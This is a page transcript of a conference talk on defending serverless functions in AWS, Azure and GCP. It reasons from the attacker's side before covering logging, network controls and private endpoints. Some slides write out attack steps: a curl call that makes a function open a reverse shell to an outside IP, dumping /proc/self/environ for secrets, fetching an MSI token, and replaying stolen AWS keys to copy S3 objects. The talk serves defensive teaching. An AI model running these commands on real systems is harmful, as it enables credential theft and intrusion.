AWS Lambda and the Serverless Cloud
AWS Lambda and the Serverless CloudAWS Lambda and the Serverless Cloud
AWS Lambda and the Serverless Cloud
 
Intro to AWS Lambda
Intro to AWS LambdaIntro to AWS Lambda
Intro to AWS Lambda
 
Riga DevDays 2017 - Efficient AWS Lambda
Riga DevDays 2017 - Efficient AWS LambdaRiga DevDays 2017 - Efficient AWS Lambda
Riga DevDays 2017 - Efficient AWS Lambda
 
Secure Kafka at scale in true multi-tenant environment ( Vishnu Balusu & Asho...
Secure Kafka at scale in true multi-tenant environment ( Vishnu Balusu & Asho...Secure Kafka at scale in true multi-tenant environment ( Vishnu Balusu & Asho...
Secure Kafka at scale in true multi-tenant environment ( Vishnu Balusu & Asho...
 
DevOps and the Future of Enterprise Security
DevOps and the Future of Enterprise SecurityDevOps and the Future of Enterprise Security
DevOps and the Future of Enterprise Security
 

Recently uploaded

Digital Tools & AI in Career Development
Digital Tools & AI in Career DevelopmentDigital Tools & AI in Career Development
Digital Tools & AI in Career DevelopmentMahmoud Rabie
 
WomenInAutomation2024: AI and Automation for eveyone
WomenInAutomation2024: AI and Automation for eveyoneWomenInAutomation2024: AI and Automation for eveyone
WomenInAutomation2024: AI and Automation for eveyoneUiPathCommunity
 
Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...
Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...
Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...Jeffrey Haguewood
 
QCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesQCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesBernd Ruecker
 
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...amber724300
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityIES VE
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesThousandEyes
 
Transcript: New from BookNet Canada for 2024: BNC SalesData and LibraryData -...
Transcript: New from BookNet Canada for 2024: BNC SalesData and LibraryData -...Transcript: New from BookNet Canada for 2024: BNC SalesData and LibraryData -...
Transcript: New from BookNet Canada for 2024: BNC SalesData and LibraryData -...BookNet Canada
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentPim van der Noll
 
Deliver Latency Free Customer Experience
Deliver Latency Free Customer ExperienceDeliver Latency Free Customer Experience
Deliver Latency Free Customer ExperienceOpsTree solutions
 
Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024TopCSSGallery
 
Women in Automation 2024: Career session - explore career paths in automation
Women in Automation 2024: Career session - explore career paths in automationWomen in Automation 2024: Career session - explore career paths in automation
Women in Automation 2024: Career session - explore career paths in automationDianaGray10
 
React JS; all concepts. Contains React Features, JSX, functional & Class comp...
React JS; all concepts. Contains React Features, JSX, functional & Class comp...React JS; all concepts. Contains React Features, JSX, functional & Class comp...
React JS; all concepts. Contains React Features, JSX, functional & Class comp...Karmanjay Verma
 
All These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDFAll These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDFMichael Gough
 
Software Security in the Real World w/Kelsey Hightower
Software Security in the Real World w/Kelsey HightowerSoftware Security in the Real World w/Kelsey Hightower
Software Security in the Real World w/Kelsey HightowerAnchore
 
Tampa BSides - The No BS SOC (slides from April 6, 2024 talk)
Tampa BSides - The No BS SOC (slides from April 6, 2024 talk)Tampa BSides - The No BS SOC (slides from April 6, 2024 talk)
Tampa BSides - The No BS SOC (slides from April 6, 2024 talk)Mark Simos
 
Green paths: Learning from publishers’ sustainability journeys - Tech Forum 2024
Green paths: Learning from publishers’ sustainability journeys - Tech Forum 2024Green paths: Learning from publishers’ sustainability journeys - Tech Forum 2024
Green paths: Learning from publishers’ sustainability journeys - Tech Forum 2024BookNet Canada
 
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS:  6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS:  6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integrationmarketing932765
 
Landscape Catalogue 2024 Australia-1.pdf
Landscape Catalogue 2024 Australia-1.pdfLandscape Catalogue 2024 Australia-1.pdf
Landscape Catalogue 2024 Australia-1.pdfAarwolf Industries LLC
 
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security ObservabilityGlenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security Observabilityitnewsafrica
 

Recently uploaded (20)

Digital Tools & AI in Career Development
Digital Tools & AI in Career DevelopmentDigital Tools & AI in Career Development
Digital Tools & AI in Career Development
 
WomenInAutomation2024: AI and Automation for eveyone
WomenInAutomation2024: AI and Automation for eveyoneWomenInAutomation2024: AI and Automation for eveyone
WomenInAutomation2024: AI and Automation for eveyone
 
Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...
Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...
Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...
 
QCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesQCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architectures
 
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a reality
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
 
Transcript: New from BookNet Canada for 2024: BNC SalesData and LibraryData -...
Transcript: New from BookNet Canada for 2024: BNC SalesData and LibraryData -...Transcript: New from BookNet Canada for 2024: BNC SalesData and LibraryData -...
Transcript: New from BookNet Canada for 2024: BNC SalesData and LibraryData -...
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
 
Deliver Latency Free Customer Experience
Deliver Latency Free Customer ExperienceDeliver Latency Free Customer Experience
Deliver Latency Free Customer Experience
 
Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024
 
Women in Automation 2024: Career session - explore career paths in automation
Women in Automation 2024: Career session - explore career paths in automationWomen in Automation 2024: Career session - explore career paths in automation
Women in Automation 2024: Career session - explore career paths in automation
 
React JS; all concepts. Contains React Features, JSX, functional & Class comp...
React JS; all concepts. Contains React Features, JSX, functional & Class comp...React JS; all concepts. Contains React Features, JSX, functional & Class comp...
React JS; all concepts. Contains React Features, JSX, functional & Class comp...
 
All These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDFAll These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDF
 
Software Security in the Real World w/Kelsey Hightower
Software Security in the Real World w/Kelsey HightowerSoftware Security in the Real World w/Kelsey Hightower
Software Security in the Real World w/Kelsey Hightower
 
Tampa BSides - The No BS SOC (slides from April 6, 2024 talk)
Tampa BSides - The No BS SOC (slides from April 6, 2024 talk)Tampa BSides - The No BS SOC (slides from April 6, 2024 talk)
Tampa BSides - The No BS SOC (slides from April 6, 2024 talk)
 
Green paths: Learning from publishers’ sustainability journeys - Tech Forum 2024
Green paths: Learning from publishers’ sustainability journeys - Tech Forum 2024Green paths: Learning from publishers’ sustainability journeys - Tech Forum 2024
Green paths: Learning from publishers’ sustainability journeys - Tech Forum 2024
 
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS:  6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS:  6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
 
Landscape Catalogue 2024 Australia-1.pdf
Landscape Catalogue 2024 Australia-1.pdfLandscape Catalogue 2024 Australia-1.pdf
Landscape Catalogue 2024 Australia-1.pdf
 
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security ObservabilityGlenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
 

Defending Serverless Infrastructure in the Cloud

  • 1. #RSAC SESSION ID: #RSAC SESSION ID: Eric Johnson Defending Serverless Infrastructure in the Cloud CSV-T12 Principal Security Engineer, Puma Security Principal Instructor, SANS Institute www.linkedin.com/in/eric-m-johnson @emjohn20
  • 2. #RSAC Cloud Serverless Infrastructure 2 Functions as a Service (FaaS) managed infrastructure offerings across the Big 3 cloud providers: GCP FunctionsAzure FunctionsAWS Lambda
  • 3. #RSAC Goals For This Session 3 Reverse engineer the serverless execution environment Discover insecurely stored function secrets Exfiltrate authentication tokens from the serverless container Detect stolen authentication tokens accessing cloud resources Apply network controls to prevent command and control Leverage audit logging and monitoring to detect malicious activity
  • 4. #RSAC#RSAC Function Execution Environment Defending Serverless Infrastructure in the Cloud
  • 5. #RSAC Function Execution Environment 5 Understanding the attacker's view of a serverless execution environment helps prioritize defenses: What user is executing the function? What operating system (OS) is running the function? What is the default directory? Where is the source code? What environment variables exist? Where are the service account creds / authentication tokens? What directories are writable?
  • 6. #RSAC Puma Security: Serverless Prey 6 Serverless Prey is an open source repository containing: Functions to establish a reverse shell in each cloud – Cheetah: Google Function – Cougar: Azure Function – Panther: AWS Lambda Code and documentation to reproduce information presented in this session https://github.com/pumasecurity/serverless-prey
  • 7. #RSAC Establishing The Function Reverse Shell 7 Function Invocation Create the connection back to the attacker's server: Reverse Shell Attacker's server waits for the incoming connections and issues commands: $ curl "https://us- central1-precise-works- 123456.cloudfunctions.net /cheetah?host=13.58.4.216 &port=1042"
  • 8. #RSAC Serverless Execution Environment 8 Reverse engineering each function's execution environment: Function OS Directory User NodeJS 12 Amazon Linux 2 /var/task sbx_user1051 .NET Core 3.1 Debian GNU/Linux 9 / app Go 1.11 Ubuntu 18.04.2 LTS /srv/files root
  • 9. #RSAC Default Function Execution Networking 9 Configurable triggers from HTTP or API Gateway events Routing allows Internet egress traffic and responses Routing allows egress traffic and responses to public cloud service APIs Function Private Subnet Public Subnet Internet Gateway Virtual Private Cloud Cloud Internet Storage Secrets
  • 11. #RSAC Hard-code in source code Serverless Secrets Management Options 11 Options for managing secrets in cloud functions: Deploy a configuration file in the function's deployment package Pass secrets into the runtime as environment variables Read secrets from cloud key management service (KMS) or secrets manager
  • 12. #RSAC Serverless Secrets: Where is the Source Code? 12 Start by looking for secrets in the function source code: GCP Functions Azure Functions AWS Lambda /var/task /home/site/wwwroot/ /srv/files
  • 13. #RSAC GCP Function: Source Code Example 13 Inspecting the GCP Function deployment package: 1 2 3 4 5 6 7 8 9 10 $ ls –la /srv/files total 167 -rw-r--r-- 1 root root 268 Jan 3 16:49 Makefile -rw-r--r-- 1 root root 1898 Jan 3 16:49 cheetah.go -rw-r--r-- 1 root root 178 Jan 3 16:49 cheetah.yaml -rw-r--r-- 1 root root 170 Jan 3 16:49 go.mod -rw-r--r-- 1 root root 1798 Jan 3 16:49 go.sum -rw-r--r-- 1 root root 939 Jan 3 16:49 package.json -rw-r--r-- 1 root root 710 Jan 3 16:49 serverless.yml GCP Functions
  • 14. #RSAC GCP Function: Configuration File Example 14 Dumping the Go function's configuration data: 1 2 3 4 5 6 7 8 9 10 11 $ cat /srv/files/cheetah.yaml # Server configurations server: host: "10.42.42.42" port: 8000 # Database credentials database: user: "cheetah_user" pass: "QnV0IHVuaWNvcm5zIGFwcGFyZW50bHkgZG8gZX hpc3Qu" GCP Functions
  • 15. #RSAC Azure Function: Environment Variable Example 15 Environment variables can be accessed by remote attackers using local file inclusion or command injection vulnerabilities: 1 2 3 4 5 6 7 8 9 $ cat /proc/self/environ WEBSITE_AUTH_ENCRYPTION_KEY=BBDAD8269958635C8D4E3C713636D APPSETTING_AzureWebJobsStorage=6BZ4kOCoSD7T1fc8v4h8JpRg== APPSETTING_APPINSIGHTS_INSTRUMENTATIONKEY=5D17A234-6B81- 4777-8528-6814374E9BD3 MSI_SECRET=A788C6DE68224140A927BB412B4E24AB AzureWebEncryptionKey=BBDAD8046F6B9F0E81A4B349 CONTAINER_ENCRYPTION_KEY=AYXxtNMabRpw2EIgoGpibUk= Azure Functions
  • 16. #RSAC Serverless Secrets Management Options 16 Secrets can be stored in cloud-native secrets management services and consumed by the function at runtime: GCP Functions Azure Functions AWS Lambda Secrets Manager / Parameter Store Azure Key Vault Secrets Manager
  • 17. #RSAC - Effect: Allow Action: "ssm:GetParameter" Resource: "arn:aws:ssm:us-east-1:1234567890 :parameter/panther/*" Secrets Management: AWS Parameter Store Example 17 Parameter store provides encrypted secrets to the function at runtime: 1 2 3 4 $ aws ssm put-parameter --name /panther/database/pass --value "Panther" --type SecureString { "Version": 1, "Tier": "Standard" } AWS Lambda 1 2 3 4 Policy allowing the function to read the parameter value:
  • 18. #RSAC#RSAC Function Execution Role Defending Serverless Infrastructure in the Cloud
  • 19. #RSAC Serverless Execution Role 19 Functions gain access to other cloud resources (vault, secrets, storage, database, etc.) by executing with predefined permissions: GCP Functions Azure Functions AWS Lambda Execution Role Managed Identity Service Account
  • 20. #RSAC GCP Function Default Service Account 20 GCP Functions New functions inherit the Google managed "Editor" role by default Editor role inherits read and modify state permissions for all existing project resources Function has full read and write access to storage buckets Payloads in the Secrets Manager require additional permissions
  • 21. #RSAC Serverless Account Credential Storage 21 Managed serverless platforms executing under a service account have credentials stored in the following locations: GCP Functions Azure Functions AWS Lambda Environment Variables Managed Service Identity (MSI) Instance Metadata Service (IMDS)
  • 22. #RSAC $ curl -H "Secret: $MSI_SECRET" "$MSI_ENDPOINT? api-version=2017-09-01& resource=https://storage.azure.com/" Azure Managed Service Identity Credentials 22 Extracting the MSI endpoint and authentication token from the function's environment: 1 2 3 4 $ cat /proc/self/environ | grep 'MSI' MSI_ENDPOINT=http://localhost:8081/msi/token MSI_SECRET=aEWPWND8qUk/U7RIkvY3IE8JetxQDZ9voUG Azure Functions 1 2 3 Requesting a JSON Web Token (JWT) from the MSI endpoint:
  • 23. #RSAC { "aud": "https://storage.azure.com/", "exp": 1577161854, "xms_mirid": "/subscriptions/12345/resourcegroups/ cougar/…/pumapreycougar" } Azure Managed Service Identity Token 23 The MSI endpoint returns a JSON Web Token (JWT) that can be used to access the requested resource: 1 2 eyJ0…QSJ9.eyJh…TM3ZcHVtYXByZXktY291Z2FyL3Byb3ZpZGVycy9NaWN yb3NvZnQuV2ViL3NpdGVzL3B1bWFwcmV5Y291Z2FyIn0.k8En4SIf…K9ag Azure Functions 1 2 3 4 5 Decoding the token reveals the audience, expiration, subscription, etc.
  • 24. #RSAC#RSAC Function Data Persistence & Exfiltration Defending Serverless Infrastructure in the Cloud
  • 25. #RSAC Function Credential Pivoting 25 Stolen function credentials can by replayed to gain access to cloud resources under the function's identity: GCP Functions Azure Functions AWS Lambda AWS CLI Azure REST API GCloud REST API
  • 26. #RSAC $ aws s3 cp s3://panther-4dad894892ce /assets/panther.jpg ~/Downloads/ AWS Credential Pivoting: Exfiltrating Secrets Example 26 Configuring the AWS CLI to authenticate as the function's execution role: 1 2 3 $ export AWS_SESSION_TOKEN=IQoJb3JpZu2DaXVzLWVhc3Q…4pg9g== $ export AWS_SECRET_ACCESS_KEY=aEWSwA8k/U7IY38JetxQDZ9voUG $ export AWS_ACCESS_KEY_ID=ASIA54BL6EJRTTJ4SS7A 1 2 3 Exfiltrating an object from the function's S3 bucket: AWS Lambda
  • 27. #RSAC Serverless Function Credential Lifetime 27 Comparing the credential expiration time (number of minutes) across the cloud providers: GCP Functions Azure Functions AWS Lambda 0 100 200 300 400 500 600 700 800
  • 28. #RSAC Function Malware Persistence Example 28 Serverless containers are vulnerable to malware persistence: All function container file systems are read only by default 1 2 3 $ echo "X5O!P…C7}$EICAR-STANDARD- ANTIVIRUS-TEST-FILE!$H+H*" > backdoor.go /bin/sh: 8: cannot create backdoor.go: Read-only file system 1 2 3 $ echo "X5O!P…C7}$EICAR-STANDARD- ANTIVIRUS-TEST-FILE!$H+H*" > /tmp/malware.sh $ cat /tmp/malware.sh X5O!P…C7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* Except: all allow write access to the /tmp directory GCP Functions
  • 29. #RSAC Serverless Function Persistence Lifetime 29 Comparing the malware persistence lifetime (number of minutes) across the cloud providers: GCP Functions Azure Functions AWS Lambda 0 2 4 6 8 10 12
  • 30. #RSAC#RSAC Detecting Compromised Function Credentials Defending Serverless Infrastructure in the Cloud
  • 31. #RSAC Function Credential Audit Logging 31 Analyzing service audit logs can identify credential usage from outside the function execution environment: Azure Functions AWS Lambda CloudTrail Azure Monitor (partial service support) IAM Audit Logs GCP Functions
  • 32. #RSAC Azure Monitor: Querying Diagnostics Example 32 Searching the diagnostics log for Azure Key Vault audit events: 1 2 3 4 AzureDiagnostics | where ResourceProvider == "MICROSOFT.KEYVAULT" | where id_s contains "cougar-database-pass" | order by TimeGenerated desc Azure Functions
  • 33. #RSAC Azure Monitor: Compromised Credentials? 33 Function service identity invoking SecretGet from inside the execution environment: 1 2 3 4 5 6 7 TimeGenerated: 1/20/2020, 1:34:52.309 AM identityClaim: …/providers/Microsoft.Web/sites/pumapreycougar id_s: https://…vault.azure.net/secrets/cougar-database-pass/… OperationName: SecretGet ResultType: Success CallerIPAddress: 20.189.179.189 clientinfo_s: azsdk-net-Security.KeyVault.Secrets/… Azure Functions
  • 34. #RSAC Azure Monitor: Compromised Credentials? 34 Function service identity invoking SecretGet from outside the execution environment: 1 2 3 4 5 6 7 TimeGenerated: 1/20/2020, 1:34:52.309 AM identityClaim: …/providers/Microsoft.Web/sites/pumapreycougar id_s: https://…vault.azure.net/secrets/cougar-database-pass/… OperationName: SecretGet ResultType: Success CallerIPAddress: 95.025.143.109 clientinfo_s: curl/7.64.1 Azure Functions
  • 35. #RSAC#RSAC Function Network Access Controls Defending Serverless Infrastructure in the Cloud
  • 36. #RSAC Function Network Integration Options 36 Function execution environments can integrate with customer managed virtual private cloud networks: Azure Functions AWS Lambda Virtual Private Cloud (VPC) Virtual Network (VNet) Integration *Premium plan only Serverless Virtual Private Cloud (VPC) Access GCP Functions
  • 37. #RSAC Function Network Integration Benefits 37 Disconnect functions from the outside world Leverage security groups for restricting traffic flow Capture function network flow logs Protect cloud resources with private cloud endpoints Function Private Subnet Public Subnet NAT Gateway Virtual Private Cloud Database (Optional) Private Cloud Endpoints Internet X X X Storage Secrets
  • 38. #RSAC Function Network Integration Example 38 Serverless framework configuration (serverless.yml) setting the function execution environment's VPC and Security Group rules: 1 2 3 4 5 6 7 8 9 provider: name: aws runtime: nodejs12.x vpc: securityGroupIds: - !Ref securityGroup subnetIds: - !Ref privateSubnet1 - !Ref privateSubnet2 AWS Lambda
  • 39. #RSAC Function Network Access Control 39 Enforcing strict function traffic flow rules can help prevent and detect malware and data exfiltration: Azure Functions AWS Lambda VPC Security Group Network Security Group (NSG) VPC Firewall Rules GCP Functions
  • 40. #RSAC Function Network Access Control Rules 40 Manage function execution environment egress traffic Create rules for trusted services Filter traffic by IP CIDR block Filter traffic by port Function Private Subnet Public Subnet NAT Gateway Virtual Private Cloud Database (Optional) Private Cloud Endpoints Internet X Storage Secrets
  • 41. #RSAC Function Traffic Flow: Security Group Example 41 Security Group configuration allowing egress traffic by port 443 and IP range: 1 2 3 4 5 6 7 8 10 11 12 securityGroup: Type: "AWS::EC2::SecurityGroup" Properties: VpcId: !Ref lambdaVpc GroupDescription: "Security group for panther." SecurityGroupEgress: - CidrIp: "10.42.0.0/16" IpProtocol: "TCP" FromPort: 443 ToPort: 443 Description: "Outbound 443 to our friends." AWS Lambda
  • 42. #RSAC Function Network Flow Logs 42 Enabling network flow logs captures information about the function's network traffic (src, dst, port, IP, etc.): Azure Functions AWS Lambda VPC Flow Logs NSG Flow Logs VPC Flow Logs GCP Functions
  • 43. #RSAC Function Network Flow: VPC Logs Example 43 Capturing flow log data in the function's assigned VPC: 1 2 3 4 5 6 7 8 flowLog: Type: AWS::EC2::FlowLog Properties: DeliverLogsPermissionArn: !GetAtt flowLogRole.Arn LogGroupName: !Sub "/aws/lambda/vpc/panther/flowlog" ResourceId: !Ref lambdaVpc ResourceType: "VPC" TrafficType: "REJECT" AWS Lambda
  • 44. #RSAC CloudWatch Insights: Querying VPC Flow Logs Example 44 Searching the CloudWatch log for flow log reject traffic: 1 2 3 4 fields @timestamp, @message | filter dstPort = 1042 | sort @timestamp desc | limit 20 AWS Lambda
  • 45. #RSAC Function Private Endpoints 45 Configuring private service endpoints creates a direct connection between the function and cloud resources (no external traffic): Azure Functions AWS Lambda Virtual Private Cloud (VPC) Endpoints Azure Private Endpoint Private Services Access GCP Functions
  • 46. #RSAC Function Private Endpoint Configuration 46 Create private endpoint cloud resources Configure function VPC to route to private endpoint Block access to cloud resource from the public API Function Private Subnet Public Subnet NAT Gateway Virtual Private Cloud Database (Optional) Private Cloud Endpoints Internet Storage Secrets
  • 47. #RSAC Function Private Endpoint: S3 Example 47 Creating a private endpoint for function access to S3: 1 2 3 4 5 6 7 8 9 10 s3Endpoint: Type: AWS::EC2::VPCEndpoint Properties: PolicyDocument: | { "Statement": [{ "Effect": "Allow" , "Principal": "*", "Action": [ "s3:*" ] }] } RouteTableIds: - !Ref privateRouteTable ServiceName: "com.amazonaws.us-east-1.s3" VpcId: !Ref lambdaVpc AWS Lambda
  • 48. #RSAC Function Private Endpoint: S3 Bucket Policy 48 Bucket policy blocking external access to S3 resources: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 bucketPolicy: Type: "AWS::S3::BucketPolicy" Properties: Bucket: !Ref bucket PolicyDocument: | { "Statement": [{ "Effect": "Deny", "Principal": { "AWS": [ Fn::GetAtt [ "LambdaExecutionRole", "Arn" ] ] }, "Action": [ "s3:*" ] }], "Resource": [ Fn:GetAtt[ "bucket", "Arn" ] ], "Condition": { "StringNotEquals": { "aws:sourceVpce": { "Ref": "lambdaVpc" } } } } ] } AWS Lambda
  • 49. #RSAC Function Private Endpoint: Blocking Public Access 49 Invoking the public S3 API with stolen credentials from an attacker's machine: 1 2 3 4 $ aws s3api list-objects --bucket panther-4dad894 An error occurred (AccessDenied) when calling the ListObjects operation: Access Denied AWS Lambda CloudTrail query searching for S3 access denied events:
  • 50. #RSAC Apply What Your Have Learned Today 50 Next week you should: – Start a serverless function inventory across the cloud providers – Scan function repositories for vulnerabilities and poor secrets management Within 3 months, you should: – Centralize function and network audit logs – Develop a monitoring and alerting strategy for function logs Within 6 months, you should: – Leverage functions to automatically detect compromised function credentials
  • 51. #RSAC Acknowledgements 51 Gal Bashan (@galbashan1) – https://github.com/epsagon/lambda-internals Brandon Evans (@BrandonMaxEvans) – Senior Application Security Engineer, Asurion OWASP Serverless Top 10 Project – https://www.owasp.org/index.php/OWASP_Serverless_Top_10_Project – Major contributions from Puresec and Protego
  • 52. #RSAC SESSION ID: #RSAC SESSION ID: Eric Johnson Defending Serverless Infrastructure in the Cloud CSV-T12 Principal Security Engineer, Puma Security Principal Instructor, SANS Institute www.linkedin.com/in/eric-m-johnson @emjohn20